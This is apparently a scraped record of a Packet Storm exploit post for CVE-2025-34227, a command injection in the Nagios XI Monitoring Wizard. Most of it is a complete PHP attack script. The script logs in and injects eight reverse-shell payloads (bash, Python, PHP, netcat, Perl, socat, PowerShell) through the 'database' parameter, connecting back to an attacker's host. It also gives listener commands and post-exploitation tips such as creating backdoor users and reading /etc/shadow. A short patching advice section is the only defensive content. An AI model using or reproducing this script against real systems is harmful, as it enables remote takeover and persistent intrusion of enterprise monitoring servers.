{“lastseen”:”2026-02-04T17:31:00″,”description”:”Nagios XI is a widely used enterprise monitoring solution. A vulnerability exists within the Monitoring Wizard configuration page where the database parameter is unsafely passed into backend operations. Authenticated users can exploit this to execute…”,”published”:”2026-02-04T00:00:00″,”modified”:”2026-02-04T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Nagios XI Monitoring Wizard Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:214917″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-34227″],”sourceData”:”=============================================================================================================================================\\n | # Title : Nagios XI Monitoring Wizard Command Injection Remote Code Execution |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/www.nagios.com\/products\/nagios-xi\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211694\/ \\u0026 CVE-2025-34227\\n \\n [+] Summary : Nagios XI is a widely used enterprise monitoring solution. A vulnerability exists within the Monitoring Wizard configuration page where the \\”database\\” parameter\\n is unsafely passed into backend operations.Authenticated users can exploit this to execute arbitrary system commands,allowing full Remote Shell access.\\n \\n [+] Vulnerability Details\\n \\n The vulnerable endpoint:\\n \\n \/config\/monitoringwizard.php\\n \\n Parameter abused:\\n \\n database = \\”information_schema;\\u003ccommand\\u003e;\\”\\n \\n No input sanitization or escaping is performed, allowing command injection.\\n \\n Authenticated attackers can:\\n \\n \u2022 Execute arbitrary system commands\\n \u2022 Obtain reverse shells\\n \u2022 Read\/write sensitive files\\n \u2022 Escalate privileges if Nagios runs with elevated permissions\\n \\n [+] Exploit Requirements\\n \\n \u2022 Valid Nagios XI user credentials\\n \u2022 Access to the Monitoring Wizard\\n \u2022 Vulnerable Nagios XI version\\n \\n [+] Exploit (PHP)\\n \\n The provided PoC does the following:\\n \\n 1. Accesses the login page and retrieves the NSP token\\n 2. Logs in using valid credentials\\n 3. Accesses the Monitoring Wizard page to get a fresh NSP\\n 4. Generates multiple reverse shell payloads (Bash, Python, PHP, Netcat, Perl, Socat, Powershell)\\n 5. Injects payloads through the vulnerable \\”database\\” parameter\\n 6. Attempts to establish a reverse shell connection to the attacker\\n \\n Save as: poc.php\\n \\n Run with:\\n \\n php poc.php \\u003ctarget-url\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e \\u003cattacker-ip\\u003e \\u003cattacker-port\\u003e\\n \\n Example:\\n \\n php poc.php http:\/\/192.168.1.100\/nagiosxi nagiosadmin pass123 192.168.1.50 4444\\n \\n [+] Usage Instructions\\n \\n 1. Start a listener on your machine:\\n \\n nc -lvnp 4444\\n or\\n rlwrap nc -lvnp 4444\\n or\\n socat TCP-LISTEN:4444,fork EXEC:\/bin\/bash\\n \\n 2. Run the exploit script with target credentials\\n 3. Observe the reverse shell connection\\n \\n [+] Impact\\n \\n Successful exploitation allows attackers to:\\n \\n \u2022 Execute arbitrary commands as Nagios user\\n \u2022 Access system files (\/etc\/passwd, \/etc\/shadow)\\n \u2022 Establish persistent access\\n \u2022 Move laterally within monitored infrastructure\\n \\n [+] Recommendations\\n \\n \u2022 Apply Nagios XI security patches\\n \u2022 Restrict access to the Monitoring Wizard\\n \u2022 Monitor outgoing connections for anomalies\\n \u2022 Harden web application configurations\\n \u2022 Audit all services added in the Monitoring Wizard\\n \\n ======================================================================\\n \\n [+] POC : \\n \\n \\u003c?php\\n \\n \/\/ \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c\\n \/\/ php poc.php \\u003ctarget-url\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e \\u003cattacker-ip\\u003e \\u003cattacker-port\\u003e\\n \/\/ \u0645\u062b\u0627\u0644: php poc.php http:\/\/192.168.1.100\/nagiosxi nagiosadmin password123 192.168.1.50 4444\\n \\n if ($argc \\u003c 6) {\\n echo \\”=====================================================\\\\n\\”;\\n echo \\”Nagios XI Reverse Shell Exploit by indoushka\\\\n\\”;\\n echo \\”=====================================================\\\\n\\”;\\n echo \\”Usage: php \\” . $argv[0] . \\” \\u003ctarget-url\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e \\u003cattacker-ip\\u003e \\u003cattacker-port\\u003e\\\\n\\\\n\\”;\\n echo \\”Examples:\\\\n\\”;\\n echo \\” php \\” . $argv[0] . \\” http:\/\/192.168.1.100\/nagiosxi nagiosadmin password123 192.168.1.50 4444\\\\n\\”;\\n echo \\” php \\” . $argv[0] . \\” https:\/\/vulnerable-nagios.local\/nagiosxi admin admin123 10.0.0.5 9001\\\\n\\\\n\\”;\\n echo \\”Note: Start listener first: nc -lvnp 4444\\\\n\\”;\\n echo \\”=====================================================\\\\n\\”;\\n exit(1);\\n }\\n \\n \/\/ \u062a\u0639\u064a\u064a\u0646 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0625\u062f\u062e\u0627\u0644\\n $target_url = rtrim($argv[1], ‘\/’);\\n $username = $argv[2];\\n $password = $argv[3];\\n $attacker_ip = $argv[4];\\n $attacker_port = (int)$argv[5];\\n \\n \/\/ \u062a\u0639\u0631\u064a\u0641 \u0627\u0644\u062b\u0648\u0627\u0628\u062a\\n define(‘SERVICE_NAME’, ‘Nagios Update Service’);\\n define(‘LOGIN_ENDPOINT’, ‘\/login.php’);\\n define(‘CONFIGWIZARD_ENDPOINT’, ‘\/config\/monitoringwizard.php’);\\n define(‘USER_AGENT’, ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’);\\n \\n \/\/ \u062f\u0627\u0644\u0629 \u0644\u0644\u0637\u0628\u0627\u0639\u0629 \u0627\u0644\u0645\u0644\u0648\u0646\u0629\\n function print_status($message, $type = ‘info’) {\\n $colors = [\\n ‘success’ =\\u003e \\”\\\\033[32m\\”, \/\/ \u0623\u062e\u0636\u0631\\n ‘error’ =\\u003e \\”\\\\033[31m\\”, \/\/ \u0623\u062d\u0645\u0631\\n ‘warning’ =\\u003e \\”\\\\033[33m\\”, \/\/ \u0623\u0635\u0641\u0631\\n ‘info’ =\\u003e \\”\\\\033[34m\\”, \/\/ \u0623\u0632\u0631\u0642\\n ‘step’ =\\u003e \\”\\\\033[36m\\”, \/\/ \u0633\u0645\u0627\u0648\u064a\\n ];\\n \\n $reset = \\”\\\\033[0m\\”;\\n $symbols = [\\n ‘success’ =\\u003e ‘[\u2713]’,\\n ‘error’ =\\u003e ‘[\u2717]’,\\n ‘warning’ =\\u003e ‘[!]’,\\n ‘info’ =\\u003e ‘[i]’,\\n ‘step’ =\\u003e ‘[\u2192]’\\n ];\\n \\n echo $colors[$type] . $symbols[$type] . \\” \\” . $message . $reset . \\”\\\\n\\”;\\n }\\n \\n \/\/ \u062f\u0627\u0644\u0629 \u0644\u0627\u0633\u062a\u062e\u0631\u0627\u062c nsp_str\\n function get_nsp_str($html) {\\n $pattern = ‘\/var\\\\s+nsp_str\\\\s*=\\\\s*\\”([a-f0-9]+)\\”\/’;\\n if (preg_match($pattern, $html, $matches)) {\\n return $matches[1];\\n }\\n return null;\\n }\\n \\n \/\/ \u062f\u0627\u0644\u0629 \u0644\u0627\u0633\u062a\u062e\u0631\u0627\u062c token \u0645\u0646 \u0627\u0644\u0635\u0641\u062d\u0629\\n function get_token($html) {\\n $pattern = ‘\/\\u003cinput[^\\u003e]*name=\\”token\\”[^\\u003e]*value=\\”([^\\”]+)\\”\/’;\\n if (preg_match($pattern, $html, $matches)) {\\n return $matches[1];\\n }\\n return null;\\n }\\n \\n \/\/ \u062f\u0627\u0644\u0629 \u0644\u0625\u0646\u0634\u0627\u0621 payload\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u0629 \u0644\u0644reverse shell\\n function generate_reverse_shell_payloads($ip, $port) {\\n $payloads = [];\\n \\n \/\/ 1. Bash Reverse Shell (\u0627\u0644\u0623\u0643\u062b\u0631 \u0634\u064a\u0648\u0639\u0627\u064b)\\n $payloads[‘bash’] = \\”bash -i \\u003e\\u0026 \/dev\/tcp\/{$ip}\/{$port} 0\\u003e\\u00261\\”;\\n \\n \/\/ 2. Python Reverse Shell\\n $payloads[‘python’] = \\”python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\”{$ip}\\\\\\”,{$port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\\\\\\”\/bin\/sh\\\\\\”,\\\\\\”-i\\\\\\”])’\\”;\\n \\n \/\/ 3. PHP Reverse Shell\\n $payloads[‘php’] = \\”php -r ‘\\\\$sock=fsockopen(\\\\\\”{$ip}\\\\\\”,{$port});exec(\\\\\\”\/bin\/sh -i \\u003c\\u00263 \\u003e\\u00263 2\\u003e\\u00263\\\\\\”);’\\”;\\n \\n \/\/ 4. Netcat Traditional\\n $payloads[‘nc_trad’] = \\”nc -e \/bin\/sh {$ip} {$port}\\”;\\n \\n \/\/ 5. Netcat OpenBSD\\n $payloads[‘nc_openbsd’] = \\”rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2\\u003e\\u00261|nc {$ip} {$port} \\u003e\/tmp\/f\\”;\\n \\n \/\/ 6. Perl Reverse Shell\\n $payloads[‘perl’] = \\”perl -e ‘use Socket;\\\\$i=\\\\\\”{$ip}\\\\\\”;\\\\$p={$port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\\\\”tcp\\\\\\”));if(connect(S,sockaddr_in(\\\\$p,inet_aton(\\\\$i)))){open(STDIN,\\\\\\”\\u003e\\u0026S\\\\\\”);open(STDOUT,\\\\\\”\\u003e\\u0026S\\\\\\”);open(STDERR,\\\\\\”\\u003e\\u0026S\\\\\\”);exec(\\\\\\”\/bin\/sh -i\\\\\\”);};’\\”;\\n \\n \/\/ 7. Socat (\u0625\u0630\u0627 \u0643\u0627\u0646 \u0645\u062b\u0628\u062a\u0627\u064b)\\n $payloads[‘socat’] = \\”socat TCP:{$ip}:{$port} EXEC:\/bin\/sh\\”;\\n \\n \/\/ 8. Powershell (\u0644\u0623\u0646\u0638\u0645\u0629 Windows \u0625\u0630\u0627 \u0643\u0627\u0646 Nagios \u064a\u0639\u0645\u0644 \u0639\u0644\u0649 Windows)\\n $payloads[‘powershell’] = \\”powershell -NoP -NonI -W Hidden -Exec Bypass -Command \\\\\\”\\\\$client = New-Object System.Net.Sockets.TCPClient(‘{$ip}’,{$port});\\\\$stream = \\\\$client.GetStream();[byte[]]\\\\$bytes = 0..65535|%{0};while((\\\\$i = \\\\$stream.Read(\\\\$bytes, 0, \\\\$bytes.Length)) -ne 0){;\\\\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\\\\$bytes,0, \\\\$i);\\\\$sendback = (iex \\\\$data 2\\u003e\\u00261 | Out-String );\\\\$sendback2 = \\\\$sendback + ‘PS ‘ + (pwd).Path + ‘\\u003e ‘;\\\\$sendbyte = ([text.encoding]::ASCII).GetBytes(\\\\$sendback2);\\\\$stream.Write(\\\\$sendbyte,0,\\\\$sendbyte.Length);\\\\$stream.Flush()};\\\\$client.Close()\\\\\\”\\”;\\n \\n return $payloads;\\n }\\n \\n \/\/ \u062f\u0627\u0644\u0629 \u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0628\u0639\u062f \u062a\u0646\u0641\u064a\u0630 shell\\n function test_shell_connection($ip, $port, $timeout = 5) {\\n $socket = @fsockopen($ip, $port, $errno, $errstr, $timeout);\\n if ($socket) {\\n fclose($socket);\\n return true;\\n }\\n return false;\\n }\\n \\n \/\/ \u062f\u0627\u0644\u0629 \u0631\u0626\u064a\u0633\u064a\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0647\u062c\u0648\u0645\\n function exploit_nagios($target_url, $username, $password, $attacker_ip, $attacker_port) {\\n \\n print_status(\\”=====================================================\\”, ‘info’);\\n print_status(\\”Starting Nagios XI Reverse Shell Exploit\\”, ‘info’);\\n print_status(\\”Target: \\” . $target_url, ‘info’);\\n print_status(\\”Attacker: \\” . $attacker_ip . \\”:\\” . $attacker_port, ‘info’);\\n print_status(\\”=====================================================\\\\n\\”, ‘info’);\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 \u062c\u0644\u0633\u0629 cURL\\n $ch = curl_init();\\n \\n \/\/ \u0625\u0639\u062f\u0627\u062f\u0627\u062a \u0623\u0633\u0627\u0633\u064a\u0629\\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\\n curl_setopt($ch, CURLOPT_USERAGENT, USER_AGENT);\\n curl_setopt($ch, CURLOPT_TIMEOUT, 30);\\n curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);\\n \\n \/\/ \u0645\u0644\u0641 \u0627\u0644\u0643\u0648\u0643\u064a\u0632\\n $cookie_file = tempnam(sys_get_temp_dir(), ‘nagios_cookie_’);\\n curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);\\n curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);\\n \\n \/\/ Proxy \u0644\u0644\u062a\u0635\u062d\u064a\u062d (\u0642\u0645 \u0628\u0625\u0644\u063a\u0627\u0621 \u0627\u0644\u062a\u0639\u0644\u064a\u0642 \u0639\u0646\u062f \u0627\u0644\u062d\u0627\u062c\u0629)\\n \/\/ curl_setopt($ch, CURLOPT_PROXY, ‘http:\/\/127.0.0.1:8080’);\\n \/\/ curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTP);\\n \\n print_status(\\”Step 1: Accessing login page…\\”, ‘step’);\\n \\n \/\/ \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0641\u062d\u0629 \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644\\n $login_url = $target_url . LOGIN_ENDPOINT;\\n curl_setopt($ch, CURLOPT_URL, $login_url);\\n curl_setopt($ch, CURLOPT_HTTPGET, true);\\n \\n $login_page = curl_exec($ch);\\n \\n if (curl_errno($ch)) {\\n print_status(\\”Failed to access login page: \\” . curl_error($ch), ‘error’);\\n return false;\\n }\\n \\n \/\/ \u0627\u0633\u062a\u062e\u0631\u0627\u062c nsp\\n $nsp_token = get_nsp_str($login_page);\\n if (!$nsp_token) {\\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0646\u0645\u0637 \u0622\u062e\u0631\\n $nsp_token = get_token($login_page);\\n }\\n \\n if (!$nsp_token) {\\n print_status(\\”Could not extract NSP token from login page\\”, ‘error’);\\n return false;\\n }\\n \\n print_status(\\”NSP Token extracted: \\” . substr($nsp_token, 0, 10) . \\”…\\”, ‘success’);\\n \\n print_status(\\”\\\\nStep 2: Attempting login…\\”, ‘step’);\\n \\n \/\/ \u0628\u064a\u0627\u0646\u0627\u062a \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644\\n $login_data = http_build_query([\\n ‘nsp’ =\\u003e $nsp_token,\\n ‘page’ =\\u003e ‘auth’,\\n ‘pageopt’ =\\u003e ‘login’,\\n ‘username’ =\\u003e $username,\\n ‘password’ =\\u003e $password,\\n ‘loginButton’ =\\u003e ”\\n ]);\\n \\n curl_setopt($ch, CURLOPT_URL, $login_url);\\n curl_setopt($ch, CURLOPT_POST, true);\\n curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);\\n \\n $login_response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0646\u062c\u0627\u062d \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644\\n $effective_url = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);\\n if (strpos($effective_url, ‘index.php’) === false \\u0026\\u0026 $http_code != 302) {\\n print_status(\\”Login failed! Check credentials\\”, ‘error’);\\n return false;\\n }\\n \\n print_status(\\”Login successful!\\”, ‘success’);\\n \\n print_status(\\”\\\\nStep 3: Accessing configuration wizard…\\”, ‘step’);\\n \\n \/\/ \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0635\u0641\u062d\u0629 configuration wizard\\n $wizard_url = $target_url . CONFIGWIZARD_ENDPOINT;\\n curl_setopt($ch, CURLOPT_URL, $wizard_url);\\n curl_setopt($ch, CURLOPT_HTTPGET, true);\\n \\n $wizard_page = curl_exec($ch);\\n \\n if (curl_errno($ch)) {\\n print_status(\\”Failed to access wizard: \\” . curl_error($ch), ‘error’);\\n return false;\\n }\\n \\n \/\/ \u0627\u0633\u062a\u062e\u0631\u0627\u062c nsp \u062c\u062f\u064a\u062f\\n $wizard_nsp = get_nsp_str($wizard_page);\\n if (!$wizard_nsp) {\\n $wizard_nsp = get_token($wizard_page);\\n }\\n \\n if (!$wizard_nsp) {\\n print_status(\\”Could not extract NSP token from wizard page\\”, ‘warning’);\\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0644\u0627\u0633\u062a\u0645\u0631\u0627\u0631 \u0645\u0639 nsp \u0627\u0644\u0642\u062f\u064a\u0645\\n $wizard_nsp = $nsp_token;\\n } else {\\n print_status(\\”New NSP Token extracted\\”, ‘success’);\\n }\\n \\n print_status(\\”\\\\nStep 4: Generating reverse shell payloads…\\”, ‘step’);\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 payload\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u0629\\n $payloads = generate_reverse_shell_payloads($attacker_ip, $attacker_port);\\n \\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 payload\u0627\u062a \u0628\u0627\u0644\u062a\u0631\u062a\u064a\u0628\\n $successful_payloads = [];\\n \\n foreach ($payloads as $name =\\u003e $payload) {\\n print_status(\\”Testing payload: \\” . $name, ‘info’);\\n \\n \/\/ \u0628\u0646\u0627\u0621 payload \u0644\u0644\u0647\u062c\u0648\u0645\\n $exploit_payload = http_build_query([\\n \\”update\\” =\\u003e 1,\\n \\”nsp\\” =\\u003e $wizard_nsp,\\n \\”step\\” =\\u003e 3,\\n \\”nextstep\\” =\\u003e 5,\\n \\”wizard\\” =\\u003e \\”mysqlquery\\”,\\n \\”tpl\\” =\\u003e ”,\\n \\”hostname\\” =\\u003e \\”localhost\\”,\\n \\”operation\\” =\\u003e ”,\\n \\”selectedhostconfig\\” =\\u003e ”,\\n \\”services_serial\\” =\\u003e ”,\\n \\”serviceargs_serial\\” =\\u003e ”,\\n \\”config_serial\\” =\\u003e ”,\\n \\”ip_address\\” =\\u003e \\”127.0.0.1\\”,\\n \\”port\\” =\\u003e 3306,\\n \\”username\\” =\\u003e \\”nagios\\”,\\n \\”password\\” =\\u003e \\”nagios\\”,\\n \\”database\\” =\\u003e \\”nagios; \\” . $payload . \\”; — \\”,\\n \\”queryname\\” =\\u003e SERVICE_NAME . \\” – \\” . $name,\\n \\”query\\” =\\u003e \\”SELECT ‘shell_test’\\”,\\n \\”warning\\” =\\u003e 10,\\n \\”check_interval\\” =\\u003e 1,\\n \\”retry_interval\\” =\\u003e 1,\\n \\”critical\\” =\\u003e 20,\\n \\”finishButton\\” =\\u003e \\”Finish\\”\\n ]);\\n \\n print_status(\\”Executing payload: \\” . $name, ‘info’);\\n \\n \/\/ \u0625\u0631\u0633\u0627\u0644 payload\\n curl_setopt($ch, CURLOPT_URL, $wizard_url);\\n curl_setopt($ch, CURLOPT_POST, true);\\n curl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_payload);\\n \\n $exploit_response = curl_exec($ch);\\n $exploit_http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n \\n \/\/ \u0627\u0646\u062a\u0638\u0627\u0631 \u0642\u0644\u064a\u0644\u0627\u064b \u0644\u062a\u0646\u0641\u064a\u0630 shell\\n sleep(2);\\n \\n \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0625\u0630\u0627 \u0643\u0627\u0646 shell \u0646\u0634\u0637\\n if (test_shell_connection($attacker_ip, $attacker_port, 3)) {\\n print_status(\\”SUCCESS! Reverse shell established using \\” . $name . \\” payload!\\”, ‘success’);\\n $successful_payloads[] = $name;\\n \\n \/\/ \u064a\u0645\u0643\u0646 \u0625\u064a\u0642\u0627\u0641 \u0627\u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0647\u0646\u0627 \u0625\u0630\u0627 \u0623\u0631\u062f\u0646\u0627 \u0623\u0648\u0644 shell \u0646\u0627\u062c\u062d\\n \/\/ break;\\n } else {\\n print_status(\\”Payload \\” . $name . \\” failed or shell not established\\”, ‘warning’);\\n }\\n \\n \/\/ \u062a\u0623\u062e\u064a\u0631 \u0628\u064a\u0646 \u0627\u0644\u0645\u062d\u0627\u0648\u0644\u0627\u062a\\n sleep(1);\\n }\\n \\n print_status(\\”\\\\nStep 5: Cleanup and final results…\\”, ‘step’);\\n \\n if (!empty($successful_payloads)) {\\n print_status(\\”=====================================================\\”, ‘success’);\\n print_status(\\”EXPLOIT SUCCESSFUL!\\”, ‘success’);\\n print_status(\\”The following payloads worked:\\”, ‘success’);\\n foreach ($successful_payloads as $payload) {\\n print_status(\\” – \\” . $payload, ‘success’);\\n }\\n print_status(\\”\\\\nYou should now have a reverse shell connection!\\”, ‘success’);\\n print_status(\\”Attacker: \\” . $attacker_ip . \\”:\\” . $attacker_port, ‘success’);\\n print_status(\\”=====================================================\\”, ‘success’);\\n \\n \/\/ \u0646\u0635\u0627\u0626\u062d \u0625\u0636\u0627\u0641\u064a\u0629\\n print_status(\\”\\\\n[!] IMPORTANT NOTES:\\”, ‘warning’);\\n print_status(\\”1. Keep your listener running: nc -lvnp \\” . $attacker_port, ‘info’);\\n print_status(\\”2. The service will appear in Nagios dashboard as: \\” . SERVICE_NAME, ‘info’);\\n print_status(\\”3. Manual cleanup required after exploitation:\\”, ‘warning’);\\n print_status(\\” – Remove the service from Nagios dashboard\\”, ‘warning’);\\n print_status(\\” – Kill any remaining processes\\”, ‘warning’);\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u062a\u0646\u0641\u064a\u0630 \u0623\u0645\u0631 \u0644\u0627\u062e\u062a\u0628\u0627\u0631 shell\\n print_status(\\”\\\\n[!] Testing shell with simple command…\\”, ‘info’);\\n print_status(\\”If you have a listener, try sending: whoami; id; pwd\\”, ‘info’);\\n \\n } else {\\n print_status(\\”=====================================================\\”, ‘error’);\\n print_status(\\”EXPLOIT UNSUCCESSFUL\\”, ‘error’);\\n print_status(\\”Possible reasons:\\”, ‘error’);\\n print_status(\\”1. Firewall blocking outgoing connections\\”, ‘info’);\\n print_status(\\”2. Target system missing required tools (bash, python, etc.)\\”, ‘info’);\\n print_status(\\”3. Command injection filtered or blocked\\”, ‘info’);\\n print_status(\\”4. Nagios running in restricted environment\\”, ‘info’);\\n print_status(\\”=====================================================\\”, ‘error’);\\n \\n \/\/ \u0627\u0642\u062a\u0631\u0627\u062d\u0627\u062a \u0644\u0644\u062a\u0635\u062d\u064a\u062d\\n print_status(\\”\\\\n[!] TROUBLESHOOTING TIPS:\\”, ‘warning’);\\n print_status(\\”1. Try different payload types\\”, ‘info’);\\n print_status(\\”2. Check if outbound connections are allowed from target\\”, ‘info’);\\n print_status(\\”3. Verify listener is running and not blocked by firewall\\”, ‘info’);\\n print_status(\\”4. Try using different ports (80, 443, 53)\\”, ‘info’);\\n }\\n \\n \/\/ \u062a\u0646\u0638\u064a\u0641\\n curl_close($ch);\\n if (file_exists($cookie_file)) {\\n unlink($cookie_file);\\n }\\n \\n return !empty($successful_payloads);\\n }\\n \\n \/\/ \u062f\u0627\u0644\u0629 \u0644\u062a\u0634\u063a\u064a\u0644 listener \u062a\u0644\u0642\u0627\u0626\u064a\u0627\u064b (\u0627\u062e\u062a\u064a\u0627\u0631\u064a)\\n function start_listener_hint($ip, $port) {\\n print_status(\\”\\\\n[!] LISTENER SETUP INSTRUCTIONS:\\”, ‘info’);\\n print_status(\\”Open a new terminal and run one of these commands:\\”, ‘info’);\\n print_status(\\”Netcat: nc -lvnp \\” . $port, ‘info’);\\n print_status(\\”rlwrap Netcat (for better shell): rlwrap nc -lvnp \\” . $port, ‘info’);\\n print_status(\\”Socat: socat TCP-LISTEN:\\” . $port . \\”,reuseaddr,fork EXEC:\/bin\/bash\\”, ‘info’);\\n print_status(\\”\\\\nWaiting 10 seconds before starting exploit…\\”, ‘info’);\\n sleep(10);\\n }\\n \\n \/\/ ==============================\\n \/\/ \u0627\u0644\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\\n \/\/ ==============================\\n \\n \/\/ \u0625\u0638\u0647\u0627\u0631 banner\\n echo \\”\\\\n\\”;\\n print_status(\\”=====================================================\\”, ‘info’);\\n print_status(\\”NAGIOS XI REVERSE SHELL EXPLOIT\\”, ‘info’);\\n print_status(\\”CVE: Multiple (Command Injection in Monitoring Wizard)\\”, ‘info’);\\n print_status(\\” by indoushka \\”, ‘info’);\\n print_status(\\”=====================================================\\\\n\\”, ‘info’);\\n \\n \/\/ \u0646\u0635\u0627\u0626\u062d \u0642\u0628\u0644 \u0627\u0644\u0628\u062f\u0621\\n print_status(\\”[!] PREREQUISITES:\\”, ‘warning’);\\n print_status(\\”1. Make sure you have a listener running on \\” . $attacker_ip . \\”:\\” . $attacker_port, ‘info’);\\n print_status(\\”2. Valid Nagios XI credentials required\\”, ‘info’);\\n print_status(\\”3. Target must be vulnerable to command injection\\”, ‘info’);\\n \\n echo \\”\\\\n\\”;\\n print_status(\\”Starting exploit in 5 seconds…\\”, ‘info’);\\n print_status(\\”Press Ctrl+C to cancel\\”, ‘warning’);\\n sleep(5);\\n \\n \/\/ \u0628\u062f\u0621 \u0627\u0644\u0647\u062c\u0648\u0645\\n $result = exploit_nagios($target_url, $username, $password, $attacker_ip, $attacker_port);\\n \\n \/\/ \u0646\u062a\u064a\u062c\u0629 \u0646\u0647\u0627\u0626\u064a\u0629\\n echo \\”\\\\n\\”;\\n if ($result) {\\n print_status(\\”Exploitation completed successfully!\\”, ‘success’);\\n print_status(\\”Check your listener for reverse shell connection\\”, ‘success’);\\n } else {\\n print_status(\\”Exploitation failed. Review the errors above.\\”, ‘error’);\\n }\\n \\n \/\/ \u0646\u0635\u0627\u0626\u062d \u0625\u0636\u0627\u0641\u064a\u0629 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0645\u062a\u0642\u062f\u0645\\n echo \\”\\\\n\\”;\\n print_status(\\”[+] ADVANCED EXPLOITATION TIPS:\\”, ‘info’);\\n print_status(\\”1. For persistent access, add SSH key or create backdoor user\\”, ‘info’);\\n print_status(\\”2. Use encryption: socat with SSL or cryptcat\\”, ‘info’);\\n print_status(\\”3. Upgrade shell: python -c ‘import pty; pty.spawn(\\\\\\”\/bin\/bash\\\\\\”)’\\”, ‘info’);\\n print_status(\\”4. Check for sensitive files: \/etc\/passwd, \/etc\/shadow, nagios configs\\”, ‘info’);\\n print_status(\\”5. Look for other Nagios vulnerabilities for privilege escalation\\”, ‘info’);\\n \\n exit($result ? 0 : 1);\\n \\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214917″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214917\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-04T17:31:00″,”description”:”Nagios XI is a widely used enterprise monitoring solution. A vulnerability exists within the Monitoring Wizard configuration page where the database parameter is unsafely passed…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-39063","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n